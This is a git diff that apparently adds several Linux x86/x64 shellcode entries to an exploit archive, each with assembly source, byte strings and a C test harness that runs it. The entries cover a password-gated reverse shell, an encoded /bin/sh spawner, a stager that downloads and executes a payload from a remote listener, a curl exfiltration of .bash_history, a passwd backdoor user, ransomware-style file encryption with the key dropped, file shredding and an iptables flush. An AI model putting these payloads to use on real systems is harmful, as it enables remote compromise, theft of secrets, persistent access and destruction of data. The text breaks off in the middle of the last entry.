@@ -0,0 +1,155 @@
+/*
+; Title		: Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+global _start
+
+%define pass "pass"
+%define port 0x5c11  ; htons(4444)
+
+_start:
+    jmp real_start
+    password: db pass
+    pass_len: db $-password
+
+real_start:
+socket:
+    ; sock = socket(AF_INET, SOCK_STREAM, 0)
+    ; AF_INET = 2
+    ; SOCK_STREAM = 1
+    ; __NR_socket = 41
+    ; On success, a file descriptor for the new socket is returned
+
+    push 41
+    pop rax
+    push 2
+    pop rdi
+    push 1
+    pop rsi
+    cdq       ; copies rax's bit 31 to all bits of edx (zeroes rdx)
+    syscall
+
+    push rax
+    pop rdi
+
+connect:
+    ; server.sin_family = AF_INET;    short
+    ; server.sin_port = htons(4444);    unsigned short
+    ; server.sin_addr.s_addr = inet_addr("127.0.0.1");    unsigned long
+    ; bzero(&server.sin_zero, 8);
+    ;
+    ; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
+    ; struct sockaddr_in {
+    ;     short            sin_family;
+    ;     unsigned short   sin_port;
+    ;     struct in_addr   sin_addr;
+    ;     char             sin_zero[8];
+    ; };
+    ;
+    ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+    ; AF_INET = 2
+    ; __NR_connect = 42
+    ; On success, zero is returned
+
+    xor eax, eax
+    push rax          ; sin_zero
+    push 0x10ffff70   ; sin_addr (xored)
+    xor dword [rsp], 0x11ffff0f ; recover sin_addr
+    push word port
+    push word 2
+
+    ; connect
+    add al, 42
+    push rsp
+    pop rsi
+    add dl, 16    ; sizeof(sockaddr_in)
+    syscall
+
+dup2:
+    ; dup2(sock, 0);
+    ; dup2(sock, 1);
+    ; dup2(sock, 2);
+    ; __NR_dup2 = 33
+    ; On success, return the new file descriptor
+
+    push 2
+    pop rsi
+
+dup2_loop:
+    mov al, 33
+    syscall
+    dec esi
+    jns dup2_loop
+
+read_password:
+    ; read(int fd, void *buf, size_t count)
+    ; On success, the number of bytes read is returned
+
+    ;xor eax, eax  ; already done by dup2
+    ;rdi = "sock"  ; already done
+    push rax
+    push rax       ; create space for "buf" in the stack
+    push rsp
+    pop rsi        ; rsi = *buf
+    mov dl, 16
+    syscall
+
+compare_password:
+    xor ecx, ecx
+    lea rdi, [rel pass_len]
+    mov cl, [rdi]
+    sub rdi, rcx
+    cld
+    repz cmpsb
+    jne exit
+
+execve:
+    ; execve(const char *path, char *const argv[], char *const envp[])
+    ; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
+    ; rsi, argv = (char**) (/bin//sh, 0x00)
+    ; rdx, envp = &0x00
+
+    xor eax, eax
+    push rax
+    push rsp
+    pop rdx      ; *rdx = &0x00
+
+    mov rsi, 0x68732f2f6e69622f  ; rax2 -S $(echo /bin//sh | rev)
+    push rsi
+    push rsp
+    pop rdi      ; rdi = (char*) /bin//sh
+
+    push rax
+    push rdi
+    push rsp
+    pop rsi      ; rsi = (char**) (/bin//sh, 0x00)
+
+    mov al, 59
+    syscall
+
+exit:
+    ;xor eax, eax  ; upper bytes are zero after read
+    mov al, 60
+    syscall
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
+"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11"
+"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02"
+"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31"
+"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a"
+"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f"
+"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47292.c b/shellcodes/linux_x86-64/47292.c
new file mode 100644
index 000000000..04ad71638
--- /dev/null
+++ b/shellcodes/linux_x86-64/47292.c
@@ -0,0 +1,47 @@
+/*
+; Title		: Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes)
+; Date		: 2019-08-18
+; Author	: Gonçalo Ribeiro (@goncalor)
+; Website	: goncalor.com
+; SLAE64-ID	: 1635
+
+; this only works on machines with a CPU that supports AVX2 instructions
+
+global _start
+
+_start:
+    jmp call_decoder
+
+decoder:
+    pop rsi
+    lea rdi, [rsi+1]
+
+    ; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
+    ; for longer shellcodes a loop could be added
+    vpbroadcastb ymm1, [rsi]  ; avx2
+    vmovdqu ymm0, [rdi]       ; avx
+    vpxor ymm0, ymm1          ; avx2
+    vmovdqu [rdi], ymm0       ; avx
+
+    jmp encoded_shellcode
+
+call_decoder:
+    call decoder
+    xor_value: db 0xaa
+    encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+char code[] =
+"\xeb\x18\x5e\x48\x8d\x7e\x01\xc4\xe2\x7d\x78\x0e\xc5\xfe\x6f\x07\xc5\xfd"
+"\xef\xc1\xc5\xfe\x7f\x07\xeb\x06\xe8\xe3\xff\xff\xff\xaa\xe2\x9b\x6a\xfa"
+"\xe2\x23\x48\xe2\x14\x85\xc8\xc3\xc4\x85\x85\xd9\xc2\xfc\xe2\x23\x4d\xfa"
+"\xfd\xe2\x23\x4c\x1a\x91\xa5\xaf";
+
+int main() {
+    printf("length: %lu\n", strlen(code));
+    ((int(*)()) code)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/47784.txt b/shellcodes/linux_x86-64/47784.txt
new file mode 100644
index 000000000..87ce285a2
--- /dev/null
+++ b/shellcodes/linux_x86-64/47784.txt
@@ -0,0 +1,163 @@
+;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
+;# Date: 2019-12-16
+;# Author: Lee Mazzoleni
+;# Tested on: Ubuntu 18.04.2 LTS
+; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this
+; this code is 188 bytes total (less if you delete the exit() syscall at the end)
+
+global _start
+
+section .text
+_start:
+
+        ;// =================>
+        ;// HEAP ALLOCATION =>
+        ;// =================>
+        xor rax, rax
+        mov al, 6
+        mov cl, 2
+        imul ax, cx                     ;// int brk()
+        xor rdi, rdi
+        syscall                         ;// brk()
+        xor rax, rax
+        mov al, 2
+        mov cl, 6
+        imul ax, cx
+        xor rdi, rdi
+        mov dil, 128
+        imul di, 32
+        syscall                         ;// brk(0x1000) - 4096 bytes
+        xchg rcx, rax                   ;// save addr of our allocated memory in rcx
+
+        ;//=======================>
+        ;// MAP HEAP PERMISSIONS =>
+        ;//=======================>
+        xor rax, rax
+        mov al, 9
+        xchg rdi, rcx
+        xor rsi, rsi
+        mov sil, 128
+        imul si, 32
+        xor rdx, rdx
+        mov dl, 0x7
+        xor r10, r10
+        mov r10b, 0x21
+        xor r9, r9
+        mov r8, -1
+        syscall                         ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
+        mov r9, rax                     ;// save heap address in r9
+
+        ;// ===================>
+        ;// SOCKET CONNECTION =>
+        ;// ===================>
+        xor rax, rax
+        mov al, 41                      ;// int socket()
+        xor rdi, rdi
+        inc rdi
+        inc rdi                         ;// AF_INET
+        xor rsi, rsi
+        inc rsi                         ;// SOCK_STREAM
+        xor rdx, rdx
+        mov dl, 6                       ;// IPPROTO_TCP
+        syscall                         ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
+        push rax
+        pop rdi                         ;// save the socket's fd in rdi for connect() to use
+
+        xor rax, rax
+        push rax
+        mov dword [rsp-4], 0x2a37a8c0   ;// 192.168.55.42
+        mov word [rsp-6], 0xbb01        ;// port 443 in lil' endian
+        sub rsp, 6
+        push word 0x2
+
+        xor rax, rax
+        mov al, 42                      ;// int connect()
+        mov rsi, rsp
+        xor rdx, rdx
+        mov dl, 16
+        syscall                         ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16)
+
+        ;// ====================================>
+        ;// READ CODE FROM SOCKET FD INTO HEAP =>
+        ;// ====================================>
+        mov rsi, r9                     ;// heap addr still saved in r9
+        xor rdx, rdx
+        mov dl, 41                      ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing)
+        xor rax, rax
+        syscall                         ;// read(3, heap_addr, SIZE)
+
+        ;// =================>
+        ;// CLOSE SOCKET FD =>
+        ;// =================>
+        xor rax, rax
+        mov al, 3
+        syscall                         ;// close(3)
+
+        jmp r9                          ;// jmp to the heap address in r9 and execute the downloaded payload
+
+        ;// =========>
+        ;// EXIT(0) => this bit is unnecessary if your payload already calls exit()
+        ;// =========>
+        xor rax, rax
+        mov al, 60
+        xor rdi, rdi
+        syscall
+
+
+; ===============>
+; ===== Usage ===>
+; ===============>
+; =========================================================================================
+; this program downloads a secondary payload from a remote host, and executes it.
+; in this example, the payload used will be a simple hello-world-like program (hello.asm):
+; =========================================================================================
+; global _start
+; section .text
+; _start:
+;	mov rax, 1
+;	mov rdi, 1
+;	mov rsi, 0x0a21216f6c6c6548	; "Hello!!\n"
+;	push rsi
+;	mov rsi, rsp
+;	mov rdx, 8
+;	syscall
+;	mov rax, 60
+;	xor rdi, rdi
+;	syscall
+; =========================================================================================
+; 1.) compile your payload:
+; -----------------------------------------------------------------------------------------
+; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o
+; =========================================================================================
+; 2.) retrieve the opcodes for the payload:
+; -----------------------------------------------------------------------------------------
+; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo
+; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05
+; =========================================================================================
+; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this:
+; -----------------------------------------------------------------------------------------
+; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l
+; 41
+; =========================================================================================
+; 4.) decode the bytes into raw form and serve it via netcat listener:
+; -----------------------------------------------------------------------------------------
+; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload
+; nc -lvp 443 < payload
+; listening on [any] 443 ...
+; =========================================================================================
+; 5.) one last step before compiling this stager, add your own IP address to line 69:
+; -----------------------------------------------------------------------------------------
+; import struct, socket
+; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0]))
+; 0x2a37a8c0
+; =========================================================================================
+; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload
+; -----------------------------------------------------------------------------------------
+; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o
+; ./stager
+;  Hello!!
+; =========================================================================================
+
+
+; Raw paste:
+; 4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f0548914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46689.c b/shellcodes/linux_x86/46689.c
new file mode 100644
index 000000000..78fab765b
--- /dev/null
+++ b/shellcodes/linux_x86/46689.c
@@ -0,0 +1,98 @@
+# Exploit Title: Linux/x86 add user to passwd file shellcode (149 bytes)
+# Google Dork: None
+# Date: 11.04.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 149
+------------------------------[Description]---------------------------------
+
+This shellcode writes a new user to the given passwd file
+
+Username = sshd
+password = root
+Shell = sh
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+	xor eax, eax
+	push eax
+
+_user:
+	push 0x0a206873
+	push 0x2f6e6962
+	push 0x2f3a706d
+	push 0x742f3a31
+	push 0x3131313a
+	push 0x31313131
+	push 0x3a30754a
+	push 0x4c5a304b
+	push 0x45683933
+	push 0x78534a52
+	push 0x50446862
+	push 0x73644d24
+	push 0x67513231
+	push 0x3458652e
+	push 0x2431243a
+	push 0x64687373
+	mov ebp, esp
+	jmp short _file
+
+_appendfile:
+	pop ecx
+	mov ebx, ecx
+	xor ecx, ecx
+	mov al, 5
+	push ebx
+	mov cx, 2001Q
+	mov dx, 0x1A4
+	int 0x80
+
+_write:
+	xor eax, eax
+	xor ebx, ebx
+	push eax
+	mov al, 4
+	add ebx, 3
+	mov ecx, ebp
+	xor edx, edx
+	add edx, 64
+	int 0x80
+
+_close:
+	xor eax, eax
+	mov al, 6
+	int 0x80
+
+_exit:
+	xor eax, eax,
+	mov al, 1
+	xor ebx, ebx
+	int 0x80
+
+_file:
+	call _appendfile
+	msg2 db "passwd", 0x00 ;change that yo your passwd file
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x6d\x70\x3a\x2f\x68\x31\x3a\x2f\x74\x68\x3a\x31\x31\x31\x68\x31\x31\x31\x31\x68\x4a\x75\x30\x3a\x68\x4b\x30\x5a\x4c\x68\x33\x39\x68\x45\x68\x52\x4a\x53\x78\x68\x62\x68\x44\x50\x68\x24\x4d\x64\x73\x68\x31\x32\x51\x67\x68\x2e\x65\x58\x34\x68\x3a\x24\x31\x24\x68\x73\x73\x68\x64\x89\xe5\xeb\x33\x59\x89\xcb\x31\xc9\xb0\x05\x53\x66\xb9\x01\x04\x66\xba\xa4\x01\xcd\x80\x31\xc0\x31\xdb\x50\xb0\x04\x83\xc3\x03\x89\xe9\x31\xd2\x83\xc2\x40\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff\xff\x70\x61\x73\x73\x77\x64";
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46704.txt b/shellcodes/linux_x86/46704.txt
new file mode 100644
index 000000000..8d845a600
--- /dev/null
+++ b/shellcodes/linux_x86/46704.txt
@@ -0,0 +1,72 @@
+# Exploit Title: Linux/x86 cat file encode to base64 and post via curl to webserver  (125 bytes)
+# Google Dork: None
+# Date: 11.04.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 125
+------------------------------[Description]---------------------------------
+
+
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+  xor eax, eax
+  push eax
+  jmp short _cmd
+
+_build:
+  pop ecx
+  mov edi, ecx
+  xor ecx, ecx
+  push eax
+  push 0x68732f6e
+  push 0x69622f2f
+
+_param:
+  mov ebx, esp
+  push eax
+  push word 0x632d
+  mov esi, esp
+
+_exec:
+  push eax
+  push edi
+  push esi
+  push ebx
+
+  mov ecx, esp
+  mov al, 11
+  int 0x80
+
+_cmd:
+  call _build
+  msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST", 0x0a
+  ; decoded url = curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -X POST
+  ;change url to your server
+  ; change file to you target file like /etc/passwd
+
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x3a\x38\x30\x38\x30\x20\x2d\x64\x20\x27\x64\x61\x74\x61\x3d\x27\x24\x28\x63\x61\x74\x20\x2e\x62\x61\x73\x68\x5f\x68\x69\x73\x74\x6f\x72\x79\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x2d\x77\x20\x30\x29\x20\x2d\x58\x20\x50\x4f\x53\x54\x0a";
+
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46791.c b/shellcodes/linux_x86/46791.c
new file mode 100644
index 000000000..9a7dad830
--- /dev/null
+++ b/shellcodes/linux_x86/46791.c
@@ -0,0 +1,67 @@
+# Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes)
+# Google Dork: None
+# Date: 02.05.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 185
+------------------------------[Description]---------------------------------
+
+This shellcode encrypts the specified file aith aes256cbc and a 32byte random key.
+After encryption the key is dropped.
+
+replace test.txt and .test.txt with any file.
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+  xor eax, eax
+  push eax
+  jmp short _cmd
+
+_exec:
+  pop ecx
+  mov edi, ecx
+  xor ecx, ecx
+  push eax
+  push 0x68732f6e
+  push 0x69622f2f
+  mov ebx, esp
+  push eax
+  push word 0x632d
+  mov esi, esp
+  push eax
+  push edi
+  push esi
+  push ebx
+  mov ecx, esp
+  mov al, 11
+  int 0x80
+
+_cmd:
+  call _exec
+  ;replace test.txt with any file
+  msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a
+
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\xeb\x23\x59\x89\xcf\x31\xc9\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x66\x68\x2d\x63\x89\xe6\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xd8\xff\xff\xff\x6d\x76\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x68\x65\x61\x64\x20\x2d\x63\x20\x33\x32\x20\x2f\x64\x65\x76\x2f\x75\x72\x61\x6e\x64\x6f\x6d\x20\x7c\x20\x62\x61\x73\x65\x36\x34\x20\x7c\x20\x6f\x70\x65\x6e\x73\x73\x6c\x20\x61\x65\x73\x2d\x32\x35\x36\x2d\x63\x62\x63\x20\x2d\x65\x20\x2d\x69\x6e\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x6f\x75\x74\x20\x74\x65\x73\x74\x2e\x74\x78\x74\x20\x2d\x70\x62\x6b\x64\x66\x32\x20\x2d\x6b\x20\x2d\x20\x26\x26\x20\x72\x6d\x20\x2e\x74\x65\x73\x74\x2e\x74\x78\x74\x0a";
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46801.txt b/shellcodes/linux_x86/46801.txt
new file mode 100644
index 000000000..5fcdb180f
--- /dev/null
+++ b/shellcodes/linux_x86/46801.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Linux/x86 shred file  (72 bytes)
+# Google Dork: None
+# Date: 02.05.2019
+# Exploit Author: strider
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 72
+------------------------------[Description]---------------------------------
+
+This shellcode shred files 64 times
+
+replace test.txt with any file you want.
+
+-----------------------------[Shellcode Dump]---------------------------------
+section .text
+
+global _start
+
+_start:
+  xor eax, eax
+  push eax
+
+  push word 0x6465
+  push 0x7268732f
+  push 0x6e69622f
+  push 0x7273752f
+
+  mov ebx, esp
+  jmp short _file
+
+_params:
+  pop ecx
+  mov ebp, ecx
+  xor ecx, ecx
+  push eax
+  push 0x6e7a762d
+  mov esi, esp
+
+  push eax
+  push word 0x3436
+  xor edx, edx
+  mov edi, esp
+
+_exec:
+  push eax
+  push ebp
+  push edi
+  push esi
+  push ebx
+  mov ecx, esp
+  mov al, 0xb
+
+  int 0x80
+
+_file:
+  call _params
+  string db "test.txt"; replace test.txt with any file you want
+
+ -----------------------------[Compile]---------------------------------------------
+ gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
+
+ -----------------------------[C-Code]-----------------------------
+
+ #include <stdio.h>
+ #include <string.h>
+
+ unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
+ void main()
+ {
+     printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+     int (*ret)() = (int(*)())shellcode;
+     ret();
+ }
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46809.c b/shellcodes/linux_x86/46809.c
new file mode 100644
index 000000000..acb36488d
--- /dev/null
+++ b/shellcodes/linux_x86/46809.c
@@ -0,0 +1,31 @@
+/*
+# Linux/x86 - execve /bin/sh shellcode (20 bytes)
+# Author: Rajvardhan
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 20
+
+Disassembly of section .text:
+
+08049000 <.text>:
+ 8049000:       31 c9                   xor    %ecx,%ecx
+ 8049002:       6a 0b                   push   $0xb
+ 8049004:       58                      pop    %eax
+ 8049005:       51                      push   %ecx
+ 8049006:       68 2f 2f 73 68          push   $0x68732f2f
+ 804900b:       68 2f 62 69 6e          push   $0x6e69622f
+ 8049010:       89 e3                   mov    %esp,%ebx
+ 8049012:       cd 80                   int    $0x80
+
+===============poc by Rajvardhan=========================
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char shellcode[] = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", strlen(shellcode));
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46829.c b/shellcodes/linux_x86/46829.c
new file mode 100644
index 000000000..3d5d97401
--- /dev/null
+++ b/shellcodes/linux_x86/46829.c
@@ -0,0 +1,52 @@
+# Title: Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
+# Author: Xavi Beltran
+# Date: 11/05/2019
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Purpose: flush iptables rules
+# Tested On: Ubuntu 3.5.0-17-generic
+# Arch: x86
+# Size: 43 bytes
+
+#################################### iptables-flush.nasm  ####################################
+
+global _start			
+
+section .text
+_start:
+	xor eax, eax
+	push eax
+	push word 0x462d
+	mov esi, esp
+	push eax
+	push dword 0x73656c62
+	push dword 0x61747069
+	mov edi,esp
+	push dword 0x2f2f6e69
+	push dword 0x62732f2f
+	mov ebx, esp
+	push eax
+	push esi
+	push edi
+	mov ecx, esp
+	mov al, 11
+	int 0x80
+
+####################################### shellcode.c  #######################################
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61\x89\xe7\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x73\x62\x89\xe3\x50\x56\x57\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46994.txt b/shellcodes/linux_x86/46994.txt
new file mode 100644
index 000000000..0ffd1bff8
--- /dev/null
+++ b/shellcodes/linux_x86/46994.txt
@@ -0,0 +1,106 @@
+# Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
+# Author: Jonathan So
+# Date: 15/06/2019
+# Purpose: decode and spawn a /bin/sh shell
+# Tested On: Linux kali 4.19.0-kali4-686 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) i686 GNU/Linux
+# Arch: x86
+# Size: 66 bytes
+# Write-up Link: https://xmilkpowderx.github.io/2019-06-15-SLAEEX4/
+
+======================================================Python Encoder======================================================
+
+#!/usr/bin/python
+#execve(/bin/sh)
+shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+encoded = ""
+encodedP2 = ""
+encoded2 = ""
+encoded2P2 = ""
+count = 1
+
+print 'Encoded shellcode ...'
+
+#Rearrange the position of shellcode and increase each of them by 1
+for x in bytearray(shellcode) :
+	x += 1
+	if count % 2 != 0:
+		encoded += '\\x'
+		encoded += '%02x' % x
+	else:
+		encodedP2 += '\\x'
+		encodedP2 += '%02x' % x
+	if count % 2 != 0:
+		encoded2 += '0x'
+		encoded2 += '%02x,' % x
+	else:
+		encoded2P2 += '0x'
+		encoded2P2 += '%02x,' % x
+	count += 1
+
+print encoded + encodedP2
+print encoded2 + encoded2P2
+
+print 'Len: %d' % len(bytearray(shellcode))
+print 'Replace number to: %d' % (count/2)
+
+======================================================Encoded Shellcode======================================================
+
+Original:   \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
+Encoded:    \x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
+
+========================================================Decoder.nasm=========================================================
+
+global _start			
+
+section .text
+_start:
+
+	jmp short call_shellcode
+decoder:
+	pop esi
+	lea edi, [esi + 13]		;half of encoded shellcode len = 25/2 = 13
+	xor ebx, ebx
+	xor ecx, ecx
+	mul ecx
+	mov edx, esp
+	mov cl, 13
+decode:                     		;Rearrange the value of shellcode
+	mov bl, byte[esi]		;get value from esi
+	dec ebx				;decrease by 1
+	mov byte[edx + eax], bl
+	inc eax
+	mov bl, byte[edi]		;get value from edi
+	dec ebx				;decrease by 1
+	mov byte[edx + eax], bl
+	inc eax
+	inc esi
+	inc edi
+	loop decode
+
+	jmp edx
+
+call_shellcode:
+
+	call decoder
+	EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
+
+======================================================objdump Generated Shellcode======================================================
+
+\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c
+\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69
+\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce
+
+============================================================Proof of Concept============================================================
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
